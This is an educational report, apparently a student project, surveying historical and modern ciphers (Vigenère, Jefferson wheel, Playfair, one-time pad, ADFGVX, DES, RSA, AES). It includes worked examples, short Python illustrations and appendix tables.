The Vigenère cipher is perceived to be more secure than monoalphabetic ciphers because it uses up to 26 different cipher alphabets to encode a message. To decipher the plaintext message, the recipient needs to know the Vigenère tableau and the key used by the sender. The Vigenère tableau in Figure 1 (refer to Appendix A) consists of a square matrix of 26 letters written repeatedly in each of the 26 rows, each row being shifted left by one position relative to the previous row, as in the Caesar cipher. If the sender would like to encrypt the plaintext message "HELLO", he first decides on a key. If he decides that the key is "HEY", he repeats the letters of the key until its length matches the length of the plaintext message, as shown in Table 3 (refer to Appendix A). With the given plaintext and key, the sender locates each cipher letter within the Vigenère tableau at the intersection of the row of the key letter and the column of the plaintext letter. For example, the first letter of the key is "H", so the sender locates the row belonging to "H" and the column belonging to the plaintext "H"; the resultant cipher-text letter is "O". The Vigenère cipher can likewise be realized using cipher discs, where the keyword specified by the sender determines the number of rotational shifts the inner disc has to perform.

Even though the Vigenère cipher is perceived to be more secure and trusted, its cipher-texts can still be decoded. For many years in the 19th century, the Vigenère cipher was deemed "le chiffre indéchiffrable" ("the unbreakable cipher"). This is mainly because it conceals the plaintext letter frequencies that monoalphabetic ciphers expose directly. For instance, in the English language, E is the most frequently used letter; if a certain letter is the most used within a cipher-text, one would normally link it to E. With the Vigenère cipher, however, occurrences of the most-used plaintext letter are encoded as different cipher-text letters, which increases the difficulty of decoding the plaintext message via frequency analysis.

In later years, though, the Vigenère cipher could be deciphered using brute force and mathematical methods. This is due to the fact that the Vigenère cipher repeats the letters of the key until the length of the key matches the length of the plaintext. Via the Kasiski test, invented in 1861 by the German army officer and cryptanalyst Friedrich W. Kasiski, identical pairings of plaintext segments with the same key symbols are seen to generate identical cipher segments, and such repetitions help to decode the plaintext message and, at the same time, break the Vigenère cipher. If the cryptanalyst can identify the correct key length via either the Kasiski or the Friedman test, the cipher-text can be easily deciphered.
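A minimal sketch of the Vigenère encryption just described, reusing the HELLO/HEY example from the text (each key letter selects the Caesar shift applied to one plaintext letter):

    from itertools import cycle

    def vigenere(text: str, key: str, decrypt: bool = False) -> str:
        out = []
        for p, k in zip(text.upper(), cycle(key.upper())):
            # The key letter selects the row of the tableau, i.e. the shift.
            shift = ord(k) - ord('A')
            if decrypt:
                shift = -shift
            out.append(chr((ord(p) - ord('A') + shift) % 26 + ord('A')))
        return ''.join(out)

    ct = vigenere("HELLO", "HEY")
    print(ct)                          # OIJSS
    print(vigenere(ct, "HEY", True))   # HELLO

Note how the two L's of HELLO encrypt to different letters (J and S) because they fall under different key letters; this is exactly the property that defeats naive frequency analysis.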
3.2 Jefferson's Wheel Cipher (http://www.freedom316.com/cryptografreaks/jefferson.php)

The Jefferson Wheel Cipher is a polyalphabetic cipher system consisting of a set of wheels and an axle. Before becoming the 3rd president of the United States, Thomas Jefferson, then the US ambassador to France, invented the Jefferson Wheel Cipher in 1795 to ensure that messages sent to the US were secure and confidential. The cipher was not made known to the US Army until 1922, when Major Joseph Oswald Mauborgne of the US Army Signal Corps enhanced the idea and came up with the M-94 cryptographic equipment. From then on, the M-94 remained the main cipher used on battlefields until 1942.

In the Jefferson Wheel Cipher, 36 wheels are used, and the 26 letters of the Latin alphabet are wrapped around each wheel in a random order. Each wheel is numbered uniquely, and the order of the wheels around the axle is a significant aspect of this cipher system: a code word created by the user corresponds to the ordering of the wheels, and different wheel orders result in different ciphers. Once the order is fixed, the user rotates the wheels until the entire message is spelled out along one row. For instance, to encrypt the sentence "You are beautiful", the letter "y" is placed on the outermost left wheel. The next wheel is rotated until the letter "o" is next to "y", the third wheel is rotated until "u" is next to "o", and so on until all the letters of the message (up to 26 letters, with no spaces or punctuation marks in between) are spelled out. The remaining rows of letters then represent either the different possible cipher-texts or the plaintext message itself. The user copies one row of cipher-text letters, excluding the row containing the original text message, and sends it to the recipient. The recipient arranges his own discs in accordance with the spelling of the cipher-text and identifies the plaintext message situated some rows apart from the cipher-text. It is highly unlikely that both the cipher row and the plaintext row would be readable and make sense in the English language, and such a scenario can in any case be prevented by the coder/sender; usually only the plaintext message is identifiable and readable, so that the recipient can spot it easily. For messages containing more than 26 letters, users have to repeat the entire process block by block until the complete cipher-text is obtained.

If the message to be encrypted is short and the order of the letters and the wheels is unknown, the Jefferson Wheel Cipher is reasonably secure against modern code-cracking techniques. The same applies to the encryption of more than one row of text with disks in the same order. If the length of the message increases substantially, one can use the letter frequencies of the English language to look for patterns and decipher the message. One limitation of this cipher system is that the user has to send copies of the cipher system to his or her recipients beforehand. In that era, this physical delivery would be extremely time-consuming, taking months to fulfill; by then, the message to be transmitted could have become useless and inaccurate. A small software sketch of the wheel mechanics follows.
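The sketch below assumes both parties share the same randomly permuted wheels in the same order; reading a fixed row offset stands in for the recipient scanning rows for readable text, and the wheels are generated from a seed purely for illustration.

    import random
    import string

    def make_wheels(n: int = 36, seed: int = 1) -> list:
        # Each wheel is a random permutation of the 26 letters; the shared
        # set of wheels (and their order on the axle) is the secret key.
        rng = random.Random(seed)
        wheels = []
        for _ in range(n):
            letters = list(string.ascii_uppercase)
            rng.shuffle(letters)
            wheels.append(''.join(letters))
        return wheels

    def encrypt(message: str, wheels: list, row: int = 7) -> str:
        # Line the message up along one row, then read off another row.
        out = []
        for ch, wheel in zip(message.upper(), wheels):
            i = wheel.index(ch)
            out.append(wheel[(i + row) % 26])
        return ''.join(out)

    def decrypt(cipher: str, wheels: list, row: int = 7) -> str:
        out = []
        for ch, wheel in zip(cipher.upper(), wheels):
            i = wheel.index(ch)
            out.append(wheel[(i - row) % 26])
        return ''.join(out)

    wheels = make_wheels()
    ct = encrypt("YOUAREBEAUTIFUL", wheels)
    print(ct, decrypt(ct, wheels))  # round-trips back to YOUAREBEAUTIFUL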
4 War Cryptography

In this segment, we will be exploring three cryptography techniques and their features, specifically the Playfair cipher, the One Time Pad and the ADFGVX cipher.

4.1 Playfair Cipher (http://www.freedom316.com/cryptografreaks/playfair.php)

The Playfair cipher is the earliest digraph substitution cipher. It encrypts pairs of letters instead of single letters as in the Caesar cipher. It uses a table in which 25 letters of the English alphabet are arranged in a 5x5 grid; typically "J" is removed from the table, and its adjacent letter "I" substitutes for it when needed to encode a plaintext message. The Playfair cipher was known to be more secure than the above-mentioned ciphers because it cannot be deciphered using the frequency analysis method normally applied to single-substitution ciphers. To identify a Playfair cipher, one would note that there are no double-letter digraphs within the cipher-text, and that the message is reasonably long.

In 1854, this manual symmetric cipher was first introduced by the scientist Charles Wheatstone. At the time, he was in charge of building up the electric telegraph system in England, and he was also looking for a method to communicate securely with his friends. Thus, he came up with the Playfair cipher, which can be encoded and solved manually, with no bulky or pricey equipment needed. However, the name "Playfair" derives from Lord Lyon Playfair, a renowned friend of Charles Wheatstone, who strongly supported and promoted the use of the cipher within the British Army. As a result, it was used by the British Army in World War I and by the Australians in World War II to conceal significant, albeit non-crucial, communications and secrets from their enemies during warfare. If the enemies got hold of the concealed messages, they would not be able to decode them promptly, owing to the difficulty of breaking the cipher; even if they could decode a message in the end, it would no longer be useful, timely or accurate.

To encode a plaintext message, the sender breaks the text into groups of two letters and looks each pair up in the key table. The following rules are adhered to during encoding. Firstly, when a digraph consists of the same letter twice, the second, repeated letter is substituted by "X". Secondly, if the letters of a digraph are located in the same row, they are substituted by the letters directly to their right. Thirdly, if the letters of a digraph are located in the same column, they are substituted by the letters directly below them. Lastly, if the letters are not located in the same row or column, each is replaced by the letter in its own row at the other corner of the rectangle formed by the pair. The sender has to preserve the order: the first letter of the encrypted pair should be positioned in the same row as the first letter of the plaintext pair. Moreover, the plaintext message must have an even number of letters.
If it contains an odd number of letters, the last letter is paired up with "X". For instance, the plaintext message "HELLO EVERYBODY" contains the repeated letters "LL", and once "X" is inserted between them it has an odd number of letters, so it is grouped as "HE LX LO EV ER YB OD YX".

Subsequently, the sender observes the letter pairs and their positions within the grid. If "playfair example" is used as the key, Figure 2 (refer to Appendix A) shows the table grid. If the plaintext message is "Hide the golds", breaking it up into groups of two letters gives the digraph letters in Table 4 (refer to Appendix A). The pair "HI" is located neither in the same row nor in the same column, so the sender replaces each letter with the one at the opposite corner of the rectangle: "HI" becomes "BM". The second pair, "DE", is located within the same column, so the sender replaces each letter with the one directly below it: "DE" becomes "OD". The third pair, "TH", is located neither in the same row nor in the same column, so it is replaced using the rectangle rule: "TH" becomes "ZB". Applying the same rules, the fourth pair "EG" is replaced by "XD", the fifth pair "OL" by "NA", and the sixth pair "DS" by "HO". In summary, "HI DE TH EG OL DS" becomes "BM OD ZB XD NA HO".

To decipher, if the letters of a cipher-text digraph are located in the same row, each is substituted with the letter directly to its left; if they are located in the same column, each is substituted with the letter directly above it.

The Playfair cipher can still be broken given a sufficient amount of text. If only the cipher-text is known, without the key or the plaintext message, a brute-force method can be used on the cipher to determine the frequency of occurrence of the digraphs. However, since there are approximately 600 possible digraphs instead of only 26 single letters, frequency analysis is only applicable when there is considerably more cipher-text to work on. Another way to attack the Playfair cipher is to observe its digraphs carefully to determine whether there exist any reversed letter pairs within a cipher-text. For instance, the cipher-text pairs "AB" and "BA" decrypt to reversed plaintext pairs such as "RE" and "ER". Words like "receiver" or "departed" both start and end with such mirrored letter pairs. In such a scenario, one would identify and match the reversed letter pairs to come up with a list of words starting and ending with the letters "RE" and "ER" respectively, before determining the correct plaintext and from it recovering the key. To make the encryption more secure, the German Army, Air Force and Police utilized the Double Playfair encryption technique during World War II. However, even the Double Playfair encryption did not prove to be a foolproof method. A compact sketch of the Playfair rules follows.
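This sketch reproduces the worked example above (key "playfair example", plaintext "Hide the golds"):

    def build_square(key: str) -> list:
        # 5x5 key square: key letters first (deduplicated), then the rest
        # of the alphabet, with J merged into I.
        seen = []
        for ch in (key.upper().replace('J', 'I')
                   + 'ABCDEFGHIKLMNOPQRSTUVWXYZ'):
            if ch.isalpha() and ch not in seen:
                seen.append(ch)
        return [seen[i:i + 5] for i in range(0, 25, 5)]

    def digraphs(text: str) -> list:
        letters = [c for c in text.upper().replace('J', 'I') if c.isalpha()]
        pairs, i = [], 0
        while i < len(letters):
            a = letters[i]
            b = letters[i + 1] if i + 1 < len(letters) else 'X'
            if a == b:                   # split double letters with X
                pairs.append(a + 'X')
                i += 1
            else:
                pairs.append(a + b)
                i += 2
        return pairs

    def encrypt_pair(square, a, b):
        find = lambda ch: next((r, row.index(ch))
                               for r, row in enumerate(square) if ch in row)
        (ra, ca), (rb, cb) = find(a), find(b)
        if ra == rb:                     # same row: take letters to the right
            return square[ra][(ca + 1) % 5] + square[rb][(cb + 1) % 5]
        if ca == cb:                     # same column: take letters below
            return square[(ra + 1) % 5][ca] + square[(rb + 1) % 5][cb]
        return square[ra][cb] + square[rb][ca]   # rectangle: swap columns

    square = build_square("playfair example")
    ct = ' '.join(encrypt_pair(square, p[0], p[1])
                  for p in digraphs("Hide the golds"))
    print(ct)   # BM OD ZB XD NA HO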
4.2 One Time Pad (http://www.freedom316.com/cryptografreaks/onetimepad.php)

The One Time Pad is a cryptography system, also often referred to as the Vernam cipher or the perfect cipher. It is the sole cryptographic technique that is mathematically unbreakable if used correctly. It is often used for diplomatic and military warfare purposes among intelligence agencies to ensure the confidentiality of transmitted messages. It was used extensively during World War II and throughout the Cold War period. The One Time Pad is known to be the only cryptography system providing bona fide message security in the long run. For the One Time Pad to be unbreakable and secure, the rules stated in Table 5 (refer to Appendix A) need to be abided by the message sender.

In 1882, the Californian banker Frank Miller invented the One Time Pad and published it in his self-written codebook entitled "Telegraphic Code to Insure Privacy and Secrecy in the Transmission of Telegrams". In 1917, Gilbert Vernam, a research engineer at AT&T, came up with an automated electro-mechanical system to encrypt messages transmitted via teletypewriter communications. The One-Time Tape he invented was a polyalphabetic cipher using a non-repeating random sequence of characters. In 1920, AT&T promoted the Vernam system, highlighting its secure communication function, but the response was unsatisfactory; instead, the one-time tapes were used by headquarters and communication centres. The machine was marketed to the government for use during World War I, but it was not put on commercial sale until 1920. It was extensively put to use only during World War II.

When a truly random key is applied to a plaintext, the resulting cipher-text is itself random. From the cipher-text alone, a third party or unintended recipient cannot solve the mathematical algorithm, because he knows neither the key nor the plaintext. In addition, since each digit or letter of the key is random, the unintended recipient cannot observe any mathematical link between cipher-text characters. Modulo-10 arithmetic (for one-time pads of digits) or modulo-26 arithmetic (for one-time pads of letters) is used to ensure that the cipher-texts disclose neither the key nor the plaintext message. Even with infinite computational power to search through all possible keys, an adversary would still be unable to identify the correct key, since every plaintext of the same length is an equally plausible decryption. Thus, the one-time pad is verifiably completely secure.

The absolutely random key is crucial to making the one-time pad mathematically unbreakable. Besides being random, the key must not be used more than once, otherwise the key can be recovered via simple cryptanalysis. This is mainly because using the same key more than once exposes the relationship between the two cipher-texts produced and the key: the cipher-texts are no longer independent, and the plaintext messages can be discovered via heuristic analysis. Known-plaintext attacks can then occur, and the key will be revealed; the adversary thereby risks exposing the contents of all encrypted messages belonging to the same key.

On the other hand, the one-time pad lacks message authentication. If the XOR method applied to the key and plaintext is known to the adversary, he can tarnish the integrity of the message by replacing it with another message of the same length, without accessing the one-time pad directly. There are methods to prevent such malicious occurrences in a one-time pad system, via the use of message authentication codes and universal hashing of messages to uphold message integrity.
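A minimal sketch of a binary one-time pad using XOR (the modulo-10 and modulo-26 variants for digits and letters work analogously); note that the pad must be truly random, at least as long as the message, and never reused.

    import secrets

    def otp_xor(data: bytes, key: bytes) -> bytes:
        # XOR is its own inverse: the same function encrypts and decrypts.
        assert len(key) >= len(data), "pad must be at least as long as the message"
        return bytes(d ^ k for d, k in zip(data, key))

    message = b"ATTACK AT DAWN"
    key = secrets.token_bytes(len(message))   # one-time, truly random pad

    ciphertext = otp_xor(message, key)
    print(ciphertext.hex())
    print(otp_xor(ciphertext, key))           # b'ATTACK AT DAWN'

The key-reuse weakness discussed above is visible directly in the algebra: if two messages p1 and p2 are encrypted with the same key k, then (p1 XOR k) XOR (p2 XOR k) = p1 XOR p2, so the key cancels out and the combined plaintexts are exposed to analysis.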
4.3 ADFGVX Cipher (http://www.freedom316.com/cryptografreaks/adfgvx.php)

The ADFGVX cipher is a fractionating transposition cipher. It was derived from the ADFGX cipher, an earlier, similar cipher invented by Colonel Fritz Nebel in 1918. The letter "V" was added to the name so that the entire alphabet, together with the digits, could be positioned in a 6x6 Polybius square; hence, substituting "I" for "J" is no longer performed. The individual letters of "ADFGVX" are extremely different from one another when converted into Morse code; the name of the cipher was chosen precisely to minimize errors during encoding and transmission. The ADFGVX cipher was introduced and utilized by the German Army in World War I to conceal communications from unintended recipients.

This cipher uses as its key a 6x6 Polybius square grid containing the 26 letters of the English alphabet and the digits from 0 to 9, as shown in Figure 3 (refer to Appendix A). Every cell of the grid is occupied by either a letter or a digit, arranged randomly via permutation. During encryption, each character of the plaintext is first substituted with the labels of its row and column in the key square. Following that, the text undergoes fractionating and columnar transposition: the intermediate text is written row by row under a transposition keyword, one character per column, with the number of columns equal to the length of the keyword, and the columns are then re-ordered by arranging the keyword letters in alphabetical order. Lastly, the cipher-text is derived by reading out the columns in the resulting order. For example, the plaintext message "Attack at 1800" results in the intermediate text "DF DG DG DF AD GG DF DG DX XF PG PG". Re-ordering the columns via permutation gives the arrangement in Figure 4 (refer to Appendix A); lastly, via fractionating and columnar transposition, the resultant cipher-text is illustrated in Figure 5 (refer to Appendix A). A code sketch of the two stages is given below.

Within the same year, the cipher was broken, with the use of complex algorithms, by Georges Painvin, a French Army lieutenant. In today's context, the ADFGVX cipher is deemed relatively insecure because it can be cryptanalysed, especially if the length of the keyword is known and the unintended recipient is able to rearrange the rows into their correct order; together with brute-force and trial-and-error techniques, the recipient might be able to decode the cipher. However, to enhance the security of the cipher, the sender can apply other ciphers to the plaintext message, so that the difficulty of decoding increases significantly.
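The following sketch shows the two stages with a hypothetical square (the alphabet followed by the digits, rather than the random square of Figure 3, so the intermediate text differs from the example above) and a hypothetical keyword:

    LABELS = "ADFGVX"
    # Hypothetical 6x6 Polybius square, read row by row: 26 letters then
    # the ten digits. A real key would be a random permutation of these.
    SQUARE = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"

    def substitute(plaintext: str) -> str:
        # Stage 1: replace each character by its row and column labels.
        out = []
        for ch in plaintext.upper():
            if ch in SQUARE:
                i = SQUARE.index(ch)
                out.append(LABELS[i // 6] + LABELS[i % 6])
        return ''.join(out)

    def transpose(text: str, keyword: str) -> str:
        # Stage 2: write the text row by row under the keyword, then read
        # the columns in alphabetical order of the keyword letters.
        n = len(keyword)
        columns = [text[i::n] for i in range(n)]
        order = sorted(range(n), key=lambda i: keyword[i])
        return ' '.join(columns[i] for i in order)

    inter = substitute("ATTACK AT 1800")
    print(inter)
    print(transpose(inter, "CARGO"))

The fractionation is what gives the cipher its strength: the transposition splits the two halves of each character's row/column pair into different places in the cipher-text, so neither substitution analysis nor transposition analysis alone suffices.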
5.0 Modern Cryptography

In this segment, we explore cryptographic techniques used in the modern context and their respective features, specifically DES, RSA and AES.

5.1 Data Encryption Standard (DES) (http://www.freedom316.com/cryptografreaks/des.php)

DES is a block cipher using a secret key shared among the intended parties. It was standardized in the 1970s by the National Bureau of Standards, with the involvement of the National Security Agency. DES was meant to offer a standard scheme for protecting sensitive commercial information and unclassified government applications from unintended parties. The initial design, named "Lucifer", was created by IBM; in 1976, after much redesign and modification, DES officially became a federal standard, and it has since been extensively adopted and published as a standard worldwide. There was public debate over the design and over the selection of the 56-bit key, but later analysis showed that the selection was appropriate and that DES was indeed well-designed. [14 in Appendix B]

In Figure 6 (Refer to Appendix A), the key determines the mechanism of the whole process. By applying its operations repeatedly, DES produces output that is approximately random, so that without the key an unintended recipient cannot recover the original plaintext message. The fundamental procedure encodes one 64-bit plaintext block at a time, iterating the round structure 16 times. The block first passes through an initial permutation. The key is initially 64 bits, but every 8th bit serves only for parity checking and is discarded after the check, leaving a 56-bit key. In each round, 48 bits derived from the 56-bit key enter a complex key-dependent function. This function is the crux of security within DES: it combines varying transformations with non-linear substitutions to ensure that the cipher is non-linear and hard to break. After the rounds of XOR and key-dependent mixing, a final permutation, the inverse of the initial permutation, is applied to the output. The ultimate output of DES is a cipher-text with the same bit-string length as the original plaintext input. At the start of each round, the 64-bit block is treated as two halves: the right 32-bit half passes through the Feistel function before being XOR-ed with the left 32-bit half, and the two halves then exchange positions (except after the last round). DES embodies two essential cryptographic techniques, confusion and diffusion: diffusion is achieved through the several permutations, while confusion comes from the key-dependent substitutions combined by XOR.

The Feistel function processes 32 bits at a time and consists of four phases. First, in the expansion phase, the 32-bit half-block is lengthened to 48 bits by the expansion permutation, which duplicates half of the input bits: the output consists of eight 6-bit blocks, each containing a copy of 4 corresponding input bits plus the adjacent bit from each neighbouring group. Second, in the key mixing phase, the output of the expansion phase is combined with a sub-key via an XOR operation; sixteen 48-bit sub-keys, one for each round, are derived from the main key. Third, the result is divided into eight 6-bit pieces that are processed by the substitution boxes: each of the eight S-boxes maps its six input bits to four output bits via a non-linear transformation defined by a lookup table. Lastly, in the permutation phase, the outputs of the eight S-boxes are concatenated into a 32-bit block that is rearranged by the P-box, a straight permutation. The resulting output is XOR-ed with the left 32-bit half from the start of the round, and, with the exception of the final round, the left and right 32-bit halves are then interchanged before the next pass through the Feistel structure.
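To illustrate the Feistel structure just described, here is a toy sketch in Python. The round function F is a deliberate stand-in for DES's expansion, S-boxes and permutations, so this is not DES itself; it only shows how the same network, run with the round keys reversed, decrypts.

    # A toy 16-round Feistel network on 64-bit blocks split into 32-bit halves.
    def F(half, round_key):
        # Placeholder mixing function; real DES uses expansion, S-boxes
        # and permutations with 48-bit round keys here.
        return (half * 0x9E3779B9 + round_key) & 0xFFFFFFFF

    def feistel_encrypt(block, round_keys):
        left, right = block >> 32, block & 0xFFFFFFFF
        for rk in round_keys:
            left, right = right, left ^ F(right, rk)
        # The final swap is omitted, as in DES.
        return (right << 32) | left

    def feistel_decrypt(block, round_keys):
        # Decryption is the same structure with the round keys reversed.
        right, left = block >> 32, block & 0xFFFFFFFF
        for rk in reversed(round_keys):
            right, left = left, right ^ F(left, rk)
        return (left << 32) | right

    keys = [0x0F1E2D3C + i for i in range(16)]   # 16 toy round keys
    ct = feistel_encrypt(0x0123456789ABCDEF, keys)
    assert feistel_decrypt(ct, keys) == 0x0123456789ABCDEF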
Since DES uses a key to operate its encryption mechanism, only those who know the particular key can decrypt the cipher-text. However, DES is no longer secure at all: its 56-bit key is so short that it is susceptible to brute-force attack, in which the key space is searched exhaustively with specialized machines and hardware. In 1998, the Electronic Frontier Foundation built a DES-cracking machine that could locate a DES key within a couple of days, and any corporation, government agency or malicious organization could purchase such a machine to decipher DES cipher-text. Triple DES, in which DES is applied three times using three different keys, has much better security characteristics, as it makes a brute-force key search computationally infeasible. Its minor disadvantage is that it runs at roughly one third of the speed of DES, though modern CPUs can still run it at a decent rate.

5.2 Rivest Shamir Adleman (RSA) (http://www.freedom316.com/cryptografreaks/rsa.php)

The RSA encryption system uses public key cryptography to provide and maintain the privacy, confidentiality and authenticity of digital data. Examples of its uses include electronic commerce protocols, web servers and browsers securing web traffic, electronic communications such as e-mail, remote log-in sessions, and credit card payment verification systems. [16 in Appendix B] RSA was invented by Ron Rivest, Adi Shamir and Len Adleman, whose first publication about RSA appeared in August 1977 in Scientific American. The name RSA consists of the initials of the three inventors' surnames, in the order listed in the published paper. In 1978, the RSA algorithm appeared in print in the Communications of the ACM.

For the RSA algorithm, the generation of prime numbers is crucial, because the security of RSA public key encryption depends largely on the computational difficulty of finding the complete factorization of a large composite integer whose prime factors are unknown. The RSA algorithm consists of four steps, namely creation of the public key, encryption of messages, creation of the private key, and decryption of messages. The public key is made known to everyone and is used to encrypt messages, while the private key is used only for decrypting them. To create the key pair, the key owner (the intended recipient of encrypted messages) chooses two large prime numbers P and Q; suppose P = 23 and Q = 41. Substituting P and Q into equation 1 (Refer to Appendix A) gives X = 880. E must be relatively prime to X, so E can be chosen as 7. Similarly, from equation 2 (Refer to Appendix A), N = 943. The public key, the value of N together with the value of E, lets any sender encrypt a message. Suppose the message is the value m = 35. To encode the message, the sender calculates the value of C in equation 3 (Refer to Appendix A); substituting the values of m, E and N gives C = 545, the encoded message that is transmitted to the recipient. To form the private key, the recipient works out the multiplicative inverse in equation 4 (Refer to Appendix A) to find D; substituting the relevant values gives D = 503, and the private key is the value of N together with the value of D. To decode the message, the recipient calculates the value of m in equation 5 (Refer to Appendix A). Substituting equation (3) into equation (5) yields equation (6) (Refer to Appendix A), which shows that recovering the transmitted message requires knowledge of the private exponent D.
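The worked example can be checked directly in Python (3.8 or later, for the modular inverse via pow); the values below are the ones used in the text.

    # Equations (1)-(5) from Appendix A, with the example values.
    P, Q = 23, 41
    X = (P - 1) * (Q - 1)        # equation (1): X = 880
    N = P * Q                    # equation (2): N = 943
    E = 7                        # public exponent, gcd(E, X) = 1
    D = pow(E, -1, X)            # equation (4): D*E mod X = 1, so D = 503

    m = 35
    C = pow(m, E, N)             # equation (3): C = 545
    assert (C, D) == (545, 503)
    assert pow(C, D, N) == m     # equation (5): decryption recovers 35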
In the above example, both P and Q are relatively small, so by brute-force mathematical methods an unintended recipient could still recover the message: he could factor N into P and Q, solve equation (1) for X, and derive D from E. When the values of P and Q become very much larger, an unintended recipient can no longer compute D this way, because finding the complete factorization of a large composite integer whose prime factors are unknown is tedious and computationally infeasible. As a result, the RSA algorithm is reasonably secure when both P and Q are large, and encrypted messages continue to maintain their confidentiality and integrity.

Because the basic RSA algorithm is a deterministic encryption technique, a malicious, unintended recipient of a message can conduct a chosen plaintext attack by encrypting candidate plaintext messages with the known public key and checking whether the results match the observed cipher-texts. An RSA cryptosystem without padding is thus not semantically secure, as such an attacker can distinguish two encrypted messages from each other. To prevent such attacks, real-world RSA implementations generally insert structured, randomized padding into the message before encryption. This ensures that a padded message encrypts to one of many possible cipher-texts, even when the underlying messages are identical.

The largest number factored by a factoring algorithm in recent years was 768 bits long. Since RSA keys are generally 1024 to 2048 bits long, RSA is still unbroken in today's context. With regard to the authentication of messages, the sender can use RSA to digitally sign a message. To sign a digital message before sending it to the intended recipient, the sender hashes the message to create a digest and encrypts that digest with his/her private key to create the digital signature, which is appended to the message. Upon receiving the digitally signed message, the intended recipient hashes the message with the identical hash algorithm, decrypts the signature with the sender's public key, and compares the resulting hash value with the message's actual hash value. If both hashes are the same, the recipient can be certain that the message was signed with the sender's private key and that the message has retained its integrity. Randomized signature schemes such as RSA-PSS (Probabilistic Signature Scheme) should be used when creating digital signatures, so as to enhance the security assurance, and the sender should also note that the same key pair should not be used for both encryption and the creation of digital signatures.

5.3 Advanced Encryption Standard (AES) (http://www.freedom316.com/cryptografreaks/aes.php)

AES is an iterative, symmetric block cipher which encrypts and decrypts electronic data using the same key.
Upon encryption, its output has the same number of bits as the original plaintext message. AES uses keys of 128, 192 or 256 bits to encrypt and decrypt data in blocks of 128 bits. [13] It repeatedly applies permutation and substitution to the input plaintext in a loop structure. AES contains no Feistel structure; instead, it uses a substitution-permutation network. In 2001, the AES algorithm was introduced by the National Institute of Standards and Technology to protect the confidentiality of sensitive information. AES was initially named Rijndael and was invented by two Belgian cryptographers, Joan Daemen and Vincent Rijmen. Because of the extremely short key in DES, many malicious attacks using sophisticated hardware and software had effectively decrypted data encrypted under DES; since DES no longer provided the fundamental security required, AES was approved by the Secretary of Commerce in 2002 to supersede DES as a federal standard. Common uses of AES include file encryption on hard disks or thumb drives and encryption of electronic mail messages.

As seen in Figure 7 (Refer to Appendix A), the AES algorithm begins with key expansion, in which round keys are derived from the cipher key according to Rijndael's key schedule. In the initial round, each byte of the state undergoes a bitwise XOR with the round key. In each of the subsequent nine rounds (for a 128-bit key), the SubBytes step updates each byte of the state matrix according to the 8-bit Rijndael substitution box lookup table; this step provides non-linearity in the cipher, being based on the multiplicative inverse over a finite field. In the ShiftRows step, the first row remains as it is, each byte of the second row is shifted one position to the left, the third row is shifted two positions to the left, and so on. In the MixColumns step, the four bytes of each column of the state are combined via an invertible linear transformation: the function operates on a four-byte input and produces a four-byte output, multiplying each column by a fixed matrix over the finite field (a constant of the cipher, not derived from the key). In the AddRoundKey step, the sub-key for the round, obtained from the main key via Rijndael's key schedule, is combined with the state: each byte of the sub-key is XOR-ed with the corresponding byte of the state. In the final round, all the steps are repeated except MixColumns, yielding the encrypted output. To recover the plaintext input from the encrypted output, the rounds above are carried out in reverse, using the same encryption key.
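As a small illustration of how the 4x4 byte state is manipulated, the sketch below implements the ShiftRows and AddRoundKey steps in Python. SubBytes and MixColumns are omitted, since they require the Rijndael S-box and the fixed MixColumns matrix over GF(2^8); the state and key bytes here are arbitrary examples of our own.

    def shift_rows(state):
        # Row r is rotated r positions to the left (row 0 is unchanged).
        return [state[r][r:] + state[r][:r] for r in range(4)]

    def add_round_key(state, round_key):
        # Bitwise XOR of each state byte with the matching round-key byte.
        return [[s ^ k for s, k in zip(srow, krow)]
                for srow, krow in zip(state, round_key)]

    state = [[r * 4 + c for c in range(4)] for r in range(4)]  # demo bytes
    key   = [[0xA5] * 4 for _ in range(4)]                     # demo sub-key
    state = add_round_key(shift_rows(state), key)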
In 2009, publications appeared describing attacks against the AES cryptosystem. However, the National Security Agency stated that AES was still capable of securing non-classified data belonging to the US government. This is mainly because the published attacks are, in theory, related-key attacks, in which the adversary needs access to plaintexts encrypted with multiple related keys. In addition, AES-256 has 14 rounds, and the published attack broke only 11 of them. At the current moment, the attack remains theoretical and beyond computational feasibility.

6 Conclusion

Since ancient times, people have been inventing cryptographic systems to conceal the messages they communicate from unintended recipients. Having studied the various cryptographic systems above, we have learnt that most cryptographic systems have their limitations. Even with such limitations, cryptography has been widely adopted, from military uses in the ancient era to commercial purposes in today's context. As newer and more complicated cryptographic techniques are developed, cracking a cipher becomes ever less likely, so people are able to further ensure message confidentiality while becoming more competent at deterring malicious attacks by third-party adversaries.

7 References (Refer to Appendix B for more references)

1. Logical Security, http://www.logicalsecurity.com/resources/whitepapers/Cryptography.pdf
2. Redline, http://www.freewebs.com/atbash_cipher/atbshhistory.htm
3. Redline, http://redline.webamphibian.com/crypt/jefferson.asp
4. Cipher Machines, http://ciphermachines.com/ciphermachines/jefferson.html
5. Britannica Encyclopedia, http://www.britannica.com/EBchecked/topic/628637/Vigenère-cipher
6. Jeremy Norman's From Cave Painting to the Internet, http://www.historyofinformation.com/index.php?id=2011
7. Vanderbilt University, http://blogs.vanderbilt.edu/mlascrypto/blog/wp-content/uploads/project-playfair-cipher.pdf
8. Shifted Bits Blog, http://www.shiftedbits.net/code/the-adfgvx-cipher/
9. Cipher Machines & Cryptography, http://users.telenet.be/d.rijmenants/en/onetimepad.htm
10. Next Wave Software, http://www.thenextwave.com/page19.html
11. Linux FreeS/WAN, http://www.freeswan.org/freeswan_trees/freeswan-1.5/doc/DES.html
12. EKU, http://people.eku.edu/styere/Encrypt/RSAdemo.html
13. Federal Information Processing Standards Publication 197, http://csrc.nist.gov/publications/fips/fips197/fips-197.pdf
14. MSDN Magazine, http://msdn.microsoft.com/en-us/magazine/cc164055.aspx
15. Business Security, http://bizsecurity.about.com/od/informationsecurity/a/aes_history.htm
16. Schneier on Security, http://www.schneier.com/blog/archives/2009/07/another_new_aes.html

Appendix A

Tables

Table 1. Atbash Cipher of the Roman alphabet
Plaintext:   A B C D E F G H I J
Cipher-text: Z Y X W V U T S R Q

Table 2. Caesar cipher of the Roman alphabet, shift of 3
Plaintext:   A B C D E F G H I J
Cipher-text: D E F G H I J K L M

Table 3. Vigenere cipher example
Plaintext: H E L L O
Key:       H E Y H E
Cipher:    O I J S S

Table 4. Playfair cipher digraph example
HI DE TH EG OL DS

Table 5. Rules of a One Time Pad (http://users.telenet.be/d.rijmenants/en/onetimepad.htm)
1. The length of the key is equal to the length of the message to be encrypted.
2. The key is random.
3. Both the key and plaintext are combined modulo 10 (digits), modulo 26 (letters) or modulo 2 (binary).
4. Each key may only be used once. After each use, both the sender and recipient must destroy their key.
